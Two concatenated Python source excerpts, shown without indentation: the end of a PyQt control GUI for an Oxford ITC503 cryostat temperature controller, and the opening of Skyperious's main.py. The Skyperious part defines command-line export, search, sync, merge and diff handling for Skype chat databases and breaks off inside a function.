# self.ITC.setTemperature(value)
# # print(f'setting ITC temperature: {value}')
# # self.set_temperature = temp
# else:
# # print('setTemp: setting sweep.')
# self.setSweep(value, self.sweep_ramp)
# # print('starting sweep!')
# # print(f'setting ITC sweep: {value}')
# self.ITC.SweepStart()
# self.ITC.getValue(0)
# @pyqtSlot(float)
# @ExceptionHandling
# def setSweepRamp(self):
# with self.lock:
# if self.sweep_running:
# self.checksweep()
# self.setSweep(self.set_temperature, self.sweep_ramp)
# self.ITC.SweepStart()
# self.ITC.getValue(0)
@pyqtSlot()
@ExceptionHandling
def setControl(self):
"""set Control of the instrument"""
self.ITC.setControl(self.control_state)
@pyqtSlot()
@ExceptionHandling
def setProportional(self):
"""set Proportional of the instrument
prop: Proportional band, in steps of 0.0001K.
"""
self.ITC.setProportional(self.set_prop)
@pyqtSlot()
@ExceptionHandling
def setIntegral(self):
"""set Integral of the instrument
integral: Integral action time, in steps of 0.1 minute.
Ranges from 0 to 140 minutes.
"""
self.ITC.setIntegral(self.set_integral)
@pyqtSlot()
@ExceptionHandling
def setDerivative(self):
"""set Derivative of the instrument
derivative: Derivative action time.
Ranges from 0 to 273 minutes.
"""
self.ITC.setDerivative(self.set_derivative)
@pyqtSlot(int)
@ExceptionHandling
def setHeaterSensor(self, value):
"""set HeaterSensor of the instrument
sensor: Should be 1, 2, or 3, corresponding to
the heater on the front panel.
"""
self.set_sensor = value
self.ITC.setHeaterSensor(self.set_sensor)
@pyqtSlot()
@ExceptionHandling
def setHeaterOutput(self):
"""set HeaterOutput of the instrument
heater_output: Sets the percent of the maximum
heater output in units of 0.1%.
Min: 0. Max: 999.
"""
self.ITC.setHeaterOutput(self.set_heater_output)
@pyqtSlot()
@ExceptionHandling
def setGasOutput(self):
"""set GasOutput of the instrument
gas_output: Sets the percent of the maximum gas
output in units of 1%.
Min: 0. Max: 99.
"""
self.ITC.setGasOutput(self.set_gas_output)
@pyqtSlot(int)
@ExceptionHandling
def setAutoControl(self, value):
"""set AutoControl of the instrument
Value:Status map
0: heater manual, gas manual
1: heater auto , gas manual
2: heater manual, gas auto
3: heater auto , gas auto
"""
self.set_auto_manual = value
self.ITC.setAutoControl(self.set_auto_manual)
@pyqtSlot(int)
def gettoset_Control(self, value):
"""receive and store the value to set the Control status"""
self.control_state = value
# @pyqtSlot(float)
# def gettoset_Temperature(self, value):
# """receive and store the value to set the temperature"""
# self.set_temperature = value
# # print('got a new temp:', value)
@pyqtSlot(float)
def gettoset_Proportional(self, value):
"""receive and store the value to set the proportional (PID)"""
self.set_prop = value
@pyqtSlot(float)
def gettoset_Integral(self, value):
"""receive and store the value to set the integral (PID)"""
self.set_integral = value
@pyqtSlot(float)
def gettoset_Derivative(self, value):
"""receive and store the value to set the derivative (PID)"""
self.set_derivative = value
@pyqtSlot(float)
def gettoset_HeaterOutput(self, value):
"""receive and store the value to set the heater_output"""
self.set_heater_output = value
@pyqtSlot(float)
def gettoset_GasOutput(self, value):
"""receive and store the value to set the gas_output"""
self.set_gas_output = value
class ITCGUI(AbstractMainApp, Window_trayService_ui):
"""docstring for ITCGUI"""
sig_sendConfTemp = pyqtSignal(dict)
sig_useAutocheck = pyqtSignal(bool)
sig_newFilePID = pyqtSignal(str)
sig_stopSweep = pyqtSignal()
def __init__(
self, identity=None, InstrumentAddress=None, prometheus_port=None, **kwargs
):
self._identity = identity
self._InstrumentAddress = InstrumentAddress
self._prometheus_port = prometheus_port
super().__init__(**kwargs)
self._logger = logging.getLogger(
"CryoGUI." + __name__ + "." + self.__class__.__name__
)
self.__name__ = "ITC_Window"
self.ITC_values = dict(setTemperature=4, SweepRate=2)
self.controls = [self.groupSettings]
self._useAutoPID = True
self._PIDFile = "./../configurations/PID_conf/P1C1.conf"
self.checkUseAuto.toggled["bool"].connect(self.fun_useAutoPID)
# self.lineConfFile.textEdited.connect(
# self.ITC_PIDFile_store)
self.pushConfLoad.clicked.connect(self.fun_PIDFile_send)
self.pushConfBrowse.clicked.connect(self.window_FileDialogOpen)
# self.lineConfFile.returnPressed.connect(
# self.fun_PIDFile_send)
QTimer.singleShot(0, self.load_settings)
QTimer.singleShot(0, self.run_Hardware)
@pyqtSlot(float)
@ExceptionHandling
def fun_setTemp_valcha(self, value):
# self.threads['control_ITC'][0].gettoset_Temperature(value)
self.ITC_values["setTemperature"] = value
@pyqtSlot(float)
@ExceptionHandling
def fun_setRamp_valcha(self, value):
self.ITC_values["SweepRate"] = value
# self.threads['control_ITC'][0].gettoset_sweepRamp(value)
@pyqtSlot(bool)
@ExceptionHandling
def fun_checkSweep_toggled(self, boolean):
self.ITC_values["Sweep_status_software"] = boolean
@pyqtSlot()
@ExceptionHandling
def fun_sendConfTemp(self):
self.fun_startTemp(
isSweep=self.ITC_values["Sweep_status_software"],
isSweepStartCurrent=True,
setTemp=self.ITC_values["setTemperature"],
end=self.ITC_values["setTemperature"],
SweepRate=self.ITC_values["SweepRate"],
)
# @pyqtSlot(dict)
# @ExceptionHandling
# def ITC_fun_routeSignalTemps(self, d: dict) -> None:
# self.ITC_fun_startTemp(isSweep=d['Sweep_status_software'],
# isSweepStartCurrent=d['isSweepStartCurrent'],
# setTemp=d['setTemperature'],
# end=d['setTemperature'],
# SweepRate=d['SweepRate'])
@pyqtSlot(dict)
def fun_startTemp(
self,
isSweep=False,
isSweepStartCurrent=True,
setTemp=4,
start=None,
end=5,
SweepRate=2,
):
self.sig_sendConfTemp.emit(
dict(
isSweep=isSweep,
isSweepStartCurrent=isSweepStartCurrent,
setTemp=setTemp,
start=start,
end=end,
SweepRate=SweepRate,
)
)
@pyqtSlot()
def run_Hardware(self):
"""method to start/stop the thread which controls the Oxford ITC"""
try:
getInfodata = self.running_thread_control(
ITC503_ControlClient(
InstrumentAddress=self._InstrumentAddress,
mainthread=self,
identity=self._identity,
prometheus_port=self._prometheus_port,
prometheus_name=self._identity,
),
"Hardware",
)
self.ITC_values["setTemperature"] = getInfodata.ITC.getValue(0)
with getInfodata.lock:
sweepstatus = getInfodata.checksweep(stop=False)
self.ITC_values["Sweep_status_software"] = sweepstatus
self.checkRamp_Status.setChecked(sweepstatus)
getInfodata.sig_Infodata.connect(self.updateGUI)
# getInfodata.sig_visaerror.connect(self.printing)
# getInfodata.sig_visaerror.connect(self.show_error_general)
# # getInfodata.sig_assertion.connect(self.printing)
# getInfodata.sig_assertion.connect(self.show_error_general)
# getInfodata.sig_visatimeout.connect(
# lambda: self.show_error_general('ITC: timeout'))
# setting ITC values by GUI
self.spinSetTemp_K.valueChanged.connect(self.fun_setTemp_valcha)
self.checkRamp_Status.toggled["bool"].connect(self.fun_checkSweep_toggled)
self.spinSetRamp_Kpmin.valueChanged.connect(self.fun_setRamp_valcha)
self.commandSendConfTemp.clicked.connect(self.fun_sendConfTemp)
# self.sig_useAutocheck.emit(self.window_settings.temp_ITC_useAutoPID)
# self.sig_newFilePID.emit(self.window_settings.temp_ITC_PIDFile)
except (VisaIOError, NameError) as e:
self._logger.exception(e)
raise ApplicationExit("Could not connect to Hardware!")
@pyqtSlot(dict)
def updateGUI(self, data):
"""
Calculate the rate of change of Temperature on the sensors [K/min]
Store ITC data in self.data['ITC'], update ITC_window
"""
# with self.dataLock:
# print('storing: ', self.time_itc[-1]-time.time(), data['Sensor_1_K'])
# self.time_itc.append(time.time())
self.data.update(data)
# this needs to draw from the self.data['INSTRUMENT'] so that in case one of the keys did not show up,
# since the command failed in the communication with the device,
# the last value is retained
for key in self.data:
if self.data[key] is None:
self.data[key] = np.nan
# if not self.data['Sensor_1_K'] is None:
self.lcdTemp_sens1_K.display(self.data["Sensor_1_K"])
# if not self.data['Sensor_2_K'] is None:
self.lcdTemp_sens2_K.display(self.data["Sensor_2_K"])
# if not self.data['Sensor_3_K'] is None:
self.lcdTemp_sens3_K.display(self.data["Sensor_3_K"])
# if not self.data['set_temperature'] is None:
self.lcdTemp_set.display(self.data["set_temperature"])
# if not self.data['temperature_error'] is None:
self.lcdTemp_err.display(self.data["temperature_error"])
# if not self.data['heater_output_as_percent'] is None:
try:
self.progressHeaterPercent.setValue(
int(self.data["heater_output_as_percent"])
)
# if not self.data['gas_flow_output'] is None:
self.progressNeedleValve.setValue(int(self.data["gas_flow_output"]))
except ValueError:
pass
# if not self.data['heater_output_as_voltage'] is None:
self.lcdHeaterVoltage.display(self.data["heater_output_as_voltage"])
# if not self.data['gas_flow_output'] is None:
self.lcdNeedleValve_percent.display(self.data["gas_flow_output"])
# if not self.data['proportional_band'] is None:
self.lcdProportionalID.display(self.data["proportional_band"])
# if not self.data['integral_action_time'] is None:
self.lcdPIntegrationD.display(self.data["integral_action_time"])
# if not self.data['derivative_action_time'] is None:
self.lcdPIDerivative.display(self.data["derivative_action_time"])
self.lcdTemp_sens1_calcerr_K.display(self.data["Sensor_1_calerr_K"])
self.combosetAutocontrol.setCurrentIndex(self.data["autocontrol"])
def load_settings(self):
"""load all settings store in the QSettings
set corresponding values in the 'Global Settings' window"""
settings = QSettings("TUW", "CryostatGUI")
try:
self._useAutoPID = bool(settings.value("ITC_useAutoPID", int))
self._PIDFile = settings.value("ITC_PIDFile", str)
except KeyError as e:
QTimer.singleShot(20 * 1e3, self.load_settings)
# self.show_error_general(f'could not find a key: {e}')
self._logger.warning(f"key {e} was not found in the settings")
del settings
self.checkUseAuto.setChecked(self._useAutoPID)
if isinstance(self._PIDFile, str):
text = self._PIDFile
else:
text = ""
self.lineConfFile.setText(text)
self.fun_PIDFile_read()
def fun_useAutoPID(self, boolean):
"""set the variable for the softwareAutoPID
emit signal to notify Thread
store it in settings"""
self._useAutoPID = boolean
self.sig_useAutocheck.emit(boolean)
settings = QSettings("TUW", "CryostatGUI")
settings.setValue("ITC_useAutoPID", int(boolean))
del settings
@ExceptionHandling
def fun_PIDFile_send(self, dummy):
"""reaction to signal: ITC PID file: send and store permanently"""
if isinstance(self._PIDFile, str):
text = self._PIDFile
else:
text = ""
self.sig_newFilePID.emit(text)
settings = QSettings("TUW", "CryostatGUI")
settings.setValue("ITC_PIDFile", self._PIDFile)
del settings
self.fun_PIDFile_read()
@ExceptionHandling
def fun_PIDFile_read(self):
try:
with open(self._PIDFile) as f:
self.textConfShow_current.setText(f.read())
except OSError as e:
self._logger.exception(e)
except TypeError as e:
self._logger.error(f"missing Filename! (TypeError: {e})")
@ExceptionHandling
def window_FileDialogOpen(self, test):
# print(test)
fname, __ = QtWidgets.QFileDialog.getOpenFileName(
self, "Choose PID configuration file", "c:\\", ".conf(*.conf)"
)
self.lineConfFile.setText(fname)
self._PIDFile = fname
# self.setValue('general', 'logfile_location', fname)
try:
with open(fname) as f:
self.textConfShow.setText(f.read())
except OSError as e:
self._logger.exception(e)
except TypeError as e:
self._logger.error(f"missing Filename! (TypeError: {e})")
if __name__ == "__main__":
print(
"please use the program 'start_XXX.py' to start communicating with this device!"
)
# logger = logging.getLogger()
# logger.setLevel(logging.DEBUG)
# logger_2 = logging.getLogger("pyvisa")
# logger_2.setLevel(logging.INFO)
# logger_3 = logging.getLogger("PyQt5")
# logger_3.setLevel(logging.INFO)
# handler = logging.StreamHandler(sys.stdout)
# handler.setLevel(logging.DEBUG)
# formatter = logging.Formatter(
# "%(asctime)s - %(levelname)s - %(name)s - %(funcName)s - %(message)s"
# )
# handler.setFormatter(formatter)
# logger.addHandler(handler)
# logger_2.addHandler(handler)
# logger_3.addHandler(handler)
# app = QtWidgets.QApplication(sys.argv)
# ITC_Instrumentadress = "ASRL6::INSTR"
# form = ITCGUI(
# ui_file="itc503_main.ui",
# Name="ITC 503",
# identity="ITC",
# InstrumentAddress=ITC_Instrumentadress,
# prometheus_port=8001,
# )
# form.show()
# # print('date: ', dt.datetime.now(),
# # '\nstartup time: ', time.time() - a)
# sys.exit(app.exec_())
|
main.py
|
# -*- coding: utf-8 -*-
"""
Skyperious main program entrance: launches GUI application or executes command
line interface, handles logging and status calls.
------------------------------------------------------------------------------
This file is part of Skyperious - Skype chat history tool.
Released under the MIT License.
@author Erki Suurjaak
@created 26.11.2011
@modified 19.09.2020
------------------------------------------------------------------------------
"""
from __future__ import print_function
import argparse
import atexit
import codecs
import collections
import datetime
import errno
import getpass
import glob
import locale
import logging
import io
import itertools
import Queue
import os
import shutil
import sys
import threading
import time
import traceback
import warnings
try:
import wx
is_gui_possible = True
except ImportError:
is_gui_possible = False
try: # For printing to a console from a packaged Windows binary
import win32console
except ImportError:
win32console = None
from . lib import util
from . import conf
from . import export
from . import guibase
from . import live
from . import skypedata
from . import workers
if is_gui_possible:
from . import gui
def date(s): return datetime.datetime.strptime(s, "%Y-%m-%d").date()
ARGUMENTS = {
"description": "%s - Skype chat history tool." % conf.Title,
"arguments": [
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"},
{"args": ["-v", "--version"], "action": "version",
"version": "%s %s, %s." % (conf.Title, conf.Version, conf.VersionDate)}],
"commands": [
{"name": "export",
"help": "export Skype databases as HTML, text or spreadsheet",
"description": "Export all message history from a Skype database "
"into files under a new folder" + (", or a single Excel "
"workbook with chats on separate sheets."
if export.xlsxwriter else ""),
"arguments": [
{"args": ["-t", "--type"], "dest": "type",
"choices": ["html", "xlsx", "csv", "txt", "xlsx_single"]
if export.xlsxwriter else ["html", "csv", "txt"],
"default": "html", "required": False,
"help": "export type: HTML files (default), Excel workbooks, "
"CSV spreadsheets, text files, or a single Excel "
"workbook with separate sheets" if export.xlsxwriter
else
"export type: HTML files (default), CSV spreadsheets, "
"text files"},
{"args": ["FILE"], "nargs": "+",
"help": "one or more Skype databases to export"},
{"args": ["-o", "--output"], "dest": "output_dir",
"metavar": "DIR", "required": False,
"help": "Output directory if not current directory"},
{"args": ["-c", "--chat"], "dest": "chat", "required": False,
"help": "names of specific chats to export", "nargs": "+"},
{"args": ["-a", "--author"], "dest": "author", "required": False,
"help": "names of specific authors whose chats to export",
"nargs": "+"},
{"args": ["-s", "--start"], "dest": "start_date", "required": False,
"help": "date to export messages from, as YYYY-MM-DD", "type": date},
{"args": ["-e", "--end"], "dest": "end_date", "required": False,
"help": "date to export messages until, as YYYY-MM-DD", "type": date},
{"args": ["--images-folder"], "dest": "images_folder",
"action": "store_true", "required": False,
"help": "save images into a subfolder in HTML export "
"instead of embedding into HTML"},
{"args": ["--ask-password"], "dest": "ask_password",
"action": "store_true", "required": False,
"help": "prompt for Skype password on HTML export "
"to download shared images"},
{"args": ["--store-password"], "dest": "store_password",
"action": "store_true", "required": False,
"help": "store entered password in configuration"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "search",
"help": "search Skype databases for messages or data",
"description": "Search Skype databases for messages, chat or contact "
"information, or table data.",
"arguments": [
{"args": ["-t", "--type"], "dest": "type", "required": False,
"choices": ["message", "contact", "chat", "table"],
"default": "message",
"help": "search in message body (default), in contact "
"information, in chat title and participants, or in any "
"database table"},
{"args": ["QUERY"],
"help": "search query, with a Google-like syntax, for example: "
"\"this OR that chat:links from:john\". More on syntax "
"at https://suurjaak.github.io/Skyperious/help.html. " },
{"args": ["FILE"], "nargs": "+",
"help": "Skype database file(s) to search"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "sync",
"help": "download new messages from Skype online service",
"description": "Synchronize Skype database via login to Skype online service.",
"arguments": [
{"args": ["-u", "--username"], "dest": "username",
"help": "username for Skype account, used only if the Skype database "
"does not contain account information yet"},
{"args": ["-p", "--password"], "dest": "password",
"help": "password for Skype account, if not using stored or prompted"},
{"args": ["--ask-password"], "dest": "ask_password",
"action": "store_true", "required": False,
"help": "prompt for Skype account password"},
{"args": ["--store-password"], "dest": "store_password",
"action": "store_true", "required": False,
"help": "store given password in configuration"},
{"args": ["-c", "--chat"], "dest": "chat", "required": False,
"help": "names of specific chats to sync", "nargs": "+"},
{"args": ["-a", "--author"], "dest": "author", "required": False,
"help": "names of specific authors whose chats to sync",
"nargs": "+"},
{"args": ["FILE"], "nargs": "+",
"help": "Skype database file to sync, "
"will be created if it does not exist yet"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "create",
"help": "create a new database",
"description": "Create a new blank database, or populated from "
"Skype online service, or from a Skype export archive.",
"arguments": [
{"args": ["-i", "--input"], "dest": "input",
"help": "Skype export archive to populate from (*.json;*.tar)"},
{"args": ["-u", "--username"], "dest": "username",
"help": "Skype username, for a blank database if no password"},
{"args": ["-p", "--password"], "dest": "password",
"help": "password for populating database from Skype online service"},
{"args": ["--ask-password"], "dest": "ask_password",
"action": "store_true", "required": False,
"help": "prompt for Skype account password"},
{"args": ["--store-password"], "dest": "store_password",
"action": "store_true", "required": False,
"help": "store given password in configuration"},
{"args": ["FILE"], "nargs": 1,
"help": "Skype database file to create. Overwritten if exists."},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ]
},
{"name": "merge", "help": "merge two or more Skype databases "
"into a new database",
"description": "Merge two or more Skype database files into a new "
"database in current directory, with a full combined "
"message history. New filename will be generated "
"automatically. Last database in the list will "
"be used as base for comparison.",
"arguments": [
{"args": ["FILE1"], "metavar": "FILE1", "nargs": 1,
"help": "first Skype database"},
{"args": ["FILE2"], "metavar": "FILE2", "nargs": "+",
"help": "more Skype databases"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"},
{"args": ["-o", "--output"], "dest": "output", "required": False,
"help": "Final database filename, auto-generated by default"}, ]
},
{"name": "diff", "help": "compare chat history in two Skype databases",
"description": "Compare two Skype databases for differences "
"in chat history.",
"arguments": [
{"args": ["FILE1"], "help": "first Skype database", "nargs": 1},
{"args": ["FILE2"], "help": "second Skype databases", "nargs": 1},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "gui",
"help": "launch Skyperious graphical program (default option)",
"description": "Launch Skyperious graphical program (default option)",
"arguments": [
{"args": ["FILE"], "nargs": "*",
"help": "Skype database to open on startup, if any"}, ]
},
],
}
logger = logging.getLogger(__package__)
window = None # Application main window instance
def except_hook(etype, evalue, etrace):
"""Handler for all unhandled exceptions."""
mqueue = getattr(except_hook, "queue", [])
setattr(except_hook, "queue", mqueue)
text = "".join(traceback.format_exception(etype, evalue, etrace)).strip()
log = "An unexpected error has occurred:\n\n%s"
logger.error(log, text)
if not conf.PopupUnexpectedErrors: return
conf.UnexpectedErrorCount += 1
msg = "An unexpected error has occurred:\n\n%s\n\n" \
"See log for full details." % util.format_exc(evalue)
mqueue.append(msg)
def after():
if not mqueue: return
msg = mqueue[0]
dlg = wx.RichMessageDialog(None, msg, conf.Title, wx.OK | wx.ICON_ERROR)
if conf.UnexpectedErrorCount > 2:
dlg.ShowCheckBox("&Do not pop up further errors")
dlg.ShowModal()
if dlg.IsCheckBoxChecked():
conf.PopupUnexpectedErrors = False
del mqueue[:]
conf.save()
if mqueue: mqueue.pop(0)
if mqueue and conf.PopupUnexpectedErrors: wx.CallAfter(after)
if len(mqueue) < 2: wx.CallAfter(after)
def install_thread_excepthook():
"""
Workaround for sys.excepthook not catching threading exceptions.
@from https://bugs.python.org/issue1230540
"""
init_old = threading.Thread.__init__
def init(self, *args, **kwargs):
init_old(self, *args, **kwargs)
run_old = self.run
def run_with_except_hook(*a, **b):
try: run_old(*a, **b)
except Exception: sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def run_merge(filenames, output_filename=None):
"""Merges all Skype databases to a new database."""
dbs = [skypedata.SkypeDatabase(f) for f in filenames]
db_base = dbs.pop()
counts = collections.defaultdict(lambda: collections.defaultdict(int))
postbacks = Queue.Queue()
name, ext = os.path.splitext(os.path.basename(db_base.filename))
now = datetime.datetime.now().strftime("%Y%m%d")
if not output_filename:
output_filename = util.unique_path("%s.merged.%s%s" % (name, now, ext))
output("Creating %s, using %s as base." % (output_filename, db_base))
bar = ProgressBar()
bar.start()
shutil.copyfile(db_base.filename, output_filename)
db2 = skypedata.SkypeDatabase(output_filename)
chats2 = db2.get_conversations()
db2.get_conversations_stats(chats2)
args = {"db2": db2, "type": "diff_merge_left"}
worker = workers.MergeThread(postbacks.put)
try:
for db1 in dbs:
chats = db1.get_conversations()
db1.get_conversations_stats(chats)
bar.afterword = " Processing %.*s.." % (30, db1)
worker.work(dict(args, db1=db1, chats=chats))
while True:
result = postbacks.get()
if "error" in result:
output("Error merging %s:\n\n%s" % (db1, result["error"]))
db1 = None # Signal for global break
break # while True
if "done" in result:
break # while True
if "diff" in result:
counts[db1]["chats"] += 1
counts[db1]["msgs"] += len(result["diff"]["messages"])
if "index" in result:
bar.max = result["count"]
bar.update(result["index"])
if result.get("output"):
logger.info(result["output"])
if not db1:
break # for db1
bar.stop()
bar.afterword = " Processed %s." % db1
bar.update(bar.max)
output()
finally:
worker and (worker.stop(), worker.join())
if not counts:
output("Nothing new to merge.")
db2.close()
os.unlink(output_filename)
else:
for db1 in dbs:
output("Merged %s in %s from %s." %
(util.plural("message", counts[db1]["msgs"]),
util.plural("chat", counts[db1]["chats"]), db1))
output("Merge into %s complete." % db2)
db2.close()
def run_search(filenames, query):
"""Searches the specified databases for specified query."""
dbs = [skypedata.SkypeDatabase(f) for f in filenames]
postbacks = Queue.Queue()
args = {"text": query, "table": "messages", "output": "text"}
worker = workers.SearchThread(postbacks.put)
try:
for db in dbs:
logger.info('Searching "%s" in %s.', query, db)
worker.work(dict(args, db=db))
while True:
result = postbacks.get()
if "error" in result:
output("Error searching %s:\n\n%s" %
(db, result.get("error_short", result["error"])))
break # while True
if "done" in result:
logger.info("Finished searching for \"%s\" in %s.", query, db)
break # while True
if result.get("count", 0) or conf.IsCLIVerbose:
if len(dbs) > 1:
output("%s:" % db, end=" ")
output(result["output"])
finally:
worker and (worker.stop(), worker.join())
def run_sync(filenames, username=None, password=None, ask_password=False,
store_password=False, chatnames=(), authornames=(), truncate=False):
"""Synchronizes history in specified database from Skype online service."""
ns = {"bar": None, "chat_title": None, "filename": None}
enc = sys.stdout.encoding or locale.getpreferredencoding() or "utf-8"
def progress(result=None, **kwargs):
result = result or kwargs
if "error" in result:
if ns["bar"]: ns["bar"] = ns["bar"].stop()
output("\nError syncing chat history: %(error)s" % result)
elif "contacts" == result.get("table"):
if result.get("start"):
ns["bar"] = ProgressBar(afterword=" Synchronizing contacts..")
ns["bar"].start()
elif result.get("end"):
t = ", ".join("%s %s" % (result[k], k) for k in ("new", "updated") if result[k])
ns["bar"].afterword = " Synchronized contacts%s." % (": %s" % t if t else "")
ns["bar"].update(result["total"])
ns["bar"] = ns["bar"].stop()
else:
ns["bar"].max = result["total"]
if "count" in result:
t = (", %s new" % result["new"]) if result["new"] else ""
ns["bar"].afterword = " Synchronizing contacts, %s processed%s." % (result["count"], t)
ns["bar"].update(result["count"])
elif "chats" == result.get("table"):
if result.get("start"):
output("\nSynchronizing chats..")
elif result.get("end"):
ns["bar"] = ns["bar"].stop()
output("\n\nSynchronized %s%s in %s: %s in total%s." % (
util.plural("chat", result["count"]) if result["count"] else "chats",
" (%s new)" % result["new"] if result["new"] else "",
ns["filename"],
util.plural("new message", result["message_count_new"]),
", %s updated" % result["message_count_updated"] if result["message_count_updated"] else ""
))
elif "messages" == result.get("table"):
if result.get("start"):
cc = db.get_conversations(chatidentities=[result["chat"]], reload=True, log=False)
chat = cc[0] if cc else None
title = chat["title_long_lc"] if chat else result["chat"]
if isinstance(title, unicode):
# Use encoded title for length constraint to work,
# if output would introduce escape sequences.
title2 = title.encode(enc, errors="backslashreplace")
if len(title2) != len(title): title = title2
if len(title) > 25:
title = title[:25] + ".."
if chat and skypedata.CHATS_TYPE_GROUP == chat["type"]: title += '"'
ns["chat_title"] = title
if ns["bar"]:
ns["bar"].pulse_pos = 0
ns["bar"].pause = False
ns["bar"].afterword = " Synchronizing %s" % title
else:
ns["bar"] = ProgressBar(pulse=True, interval=0.05,
afterword=" Synchronizing %s" % title)
ns["bar"].start()
elif result.get("end"):
t = ""
if any(result[k] for k in ("new", "updated")):
t += ": %s new" % result["new"]
if result["updated"]: t += ", %s updated" % result["updated"]
ns["bar"].afterword = " Synchronized %s%s." % (ns["chat_title"], t)
ns["bar"].pulse_pos = None
ns["bar"].pause = True
ns["bar"].update()
if t: output() # Force new line if chat got updated
else:
t = ""
for k in "new", "updated":
if result.get(k): t += ", %s %s" % (result[k], k)
if t: t += "."
ns["bar"].afterword = " Synchronizing %s%s" % (ns["chat_title"], t)
return True
username0, password0, passwords = username, password, {}
for filename in filenames:
filepath = os.path.realpath(filename)
file_existed = os.path.exists(filepath)
output("\nSynchronizing %s from live." % filename)
username = username0
prompt = "%s does not exist, enter Skype username: " % filename
while not file_existed and not username:
output(prompt, end="")
username = raw_input().strip()
db = skypedata.SkypeDatabase(filepath, truncate=not file_existed or truncate)
username = db.username or username
password = password0 or passwords.get(username)
prompt = "%s does not contain account information, enter Skype username: " % filename
while not username:
output(prompt, end="")
username = raw_input().strip()
if username: break # while not username
if not password and not ask_password \
and conf.Login.get(filepath, {}).get("password"):
password = util.deobfuscate(conf.Login[filepath]["password"])
prompt = "Enter Skype password for '%s': " % username
while not db.live.is_logged_in():
if ask_password or not password: password = get_password(username)
passwords[username] = password
output("Logging in to Skype as '%s'.." % username, end="")
try: db.live.login(username, password)
except Exception as e:
prompt = "\n%s\n%s" % (util.format_exc(e), prompt)
else: output(" success!")
if store_password:
conf.Login.setdefault(filename, {})
conf.Login[filename].update(store=True, password=util.obfuscate(password0))
conf.save()
chats = []
if chatnames or authornames:
cc = db.get_conversations(chatnames, authornames)
chats = [c["identity"] for c in cc]
output()
db.live.progress = progress
ns["filename"] = filename
try: db.live.populate(chats)
except Exception as e: progress(error=util.format_exc(e))
db.close()
def run_create(filenames, input=None, username=None, password=None,
ask_password=False, store_password=False):
"""Creates a new database, blank or from a Skype source."""
if not input and not username:
output("Not enough arguments.")
sys.exit(1)
if not input and username and (password or ask_password): return run_sync(
filenames, username, password, ask_password, store_password, truncate=True
)
filename = os.path.realpath(filenames[0])
if not input: # Create blank database, with just account username
logger.info("Creating new blank database %s for user '%s'.", filename, username)
db = skypedata.SkypeDatabase(filename, truncate=True)
for table in db.CREATE_STATEMENTS: db.create_table(table)
db.insert_account({"skypename": username})
output("Created blank database %s for user %s." % (filename, username))
return
counts = {}
def progress(result=None, **kwargs):
result = result or kwargs
if "counts" in result:
counts.update(result["counts"])
t = ", ".join(util.plural(x[:-1], counts[x], sep=",")
for x in sorted(counts))
bar.afterword = " Imported %s." % t
return True
username = live.SkypeExport.export_get_account(input)
db = live.SkypeExport(input, filename)
if ask_password and store_password: password = get_password(username)
logger.info("Creating new database %s from Skype export %s, user '%s'.",
filename, input, username)
output()
bar = ProgressBar(pulse=True, interval=0.05)
bar.afterword =" Importing %s" % filename
bar.start()
try: db.export_read(progress)
except Exception:
logger.exception("Error importing Skype export archive %s.", filename)
util.try_ignore(db.close)
util.try_ignore(os.unlink, filename)
raise
bar.stop()
bar.pulse = False
bar.update(100)
db.close()
if password and store_password:
conf.Login.setdefault(filename, {})
conf.Login[filename].update(store=True, password=util.obfuscate(password))
conf.save()
sz = util.format_bytes(os.path.getsize(filename))
t = " and ".join(util.plural(x[:-1], counts[x], sep=",") for x in sorted(counts))
output("\n\nCreated new database %s from Skype export archive %s." % (filename, input))
output("Database size %s, username '%s', with %s." % (sz, db.username, t))
def run_export(filenames, format, output_dir, chatnames, authornames,
start_date, end_date, images_folder, ask_password, store_password):
"""Exports the specified databases in specified format."""
dbs = [skypedata.SkypeDatabase(f) for f in filenames]
is_xlsx_single = ("xlsx_single" == format)
timerange = map(util.datetime_to_epoch, (start_date, end_date))
output_dir = output_dir or os.getcwd()
for db in dbs:
if ask_password and db.username and conf.SharedImageAutoDownload \
and "html" == format:
while not db.live.is_logged_in():
password = get_password(db.username)
try: db.live.login(password=password)
except Exception as e: output("\n" + util.format_exc(e))
if store_password:
conf.Login.setdefault(db.filename, {})
conf.Login[db.filename].update(store=True, password=util.obfuscate(password))
conf.save()
formatargs = collections.defaultdict(str)
formatargs["skypename"] = os.path.basename(db.filename)
formatargs.update(db.account or {})
basename = util.safe_filename(conf.ExportDbTemplate % formatargs)
dbstr = "from %s " % db if len(dbs) != 1 else ""
if is_xlsx_single:
path = os.path.join(output_dir, "%s.xlsx" % basename)
else:
path = os.path.join(output_dir, basename)
path = util.unique_path(path)
try:
extras = [("", chatnames)] if chatnames else []
extras += [(" with authors", authornames)] if authornames else []
output("Exporting%s%s as %s %sto %s." %
(" chats" if extras else "",
",".join("%s like %s" % (x, y) for x, y in extras),
format[:4].upper(), dbstr, path))
chats = sorted(db.get_conversations(chatnames, authornames),
key=lambda x: x["title"].lower())
db.get_conversations_stats(chats)
bar_total = sum(c["message_count"] for c in chats)
bartext = " Exporting %.*s.." % (30, db.filename) # Enforce width
pulse = any(x is not None for x in timerange)
bar = ProgressBar(max=bar_total, afterword=bartext, pulse=pulse)
bar.start()
opts = dict(progress=bar.update, timerange=timerange)
if images_folder: opts["images_folder"] = True
result = export.export_chats(chats, path, format, db, opts)
files, count, message_count = result
bar.stop()
if count:
bar.afterword = " Exported %s from %s to %s. " % (
util.plural("message", message_count), db, path)
bar.update(bar_total)
output()
logger.info("Exported %s and %s %sto %s as %s.",
util.plural("chat", count),
util.plural("message", message_count),
dbstr, path, format[:4].upper())
else:
output("\nNo messages to export%s." %
("" if len(dbs) == 1 else " from %s" % db))
util.try_ignore((os.unlink if is_xlsx_single else os.rmdir), path)
except Exception as e:
output("Error exporting chats: %s\n\n%s" %
(e, traceback.format_exc()))
def run_diff(filename1, filename2):
"""Compares the first database for changes with the second."""
if os.path.realpath(filename1) == os.path.realpath(filename2):
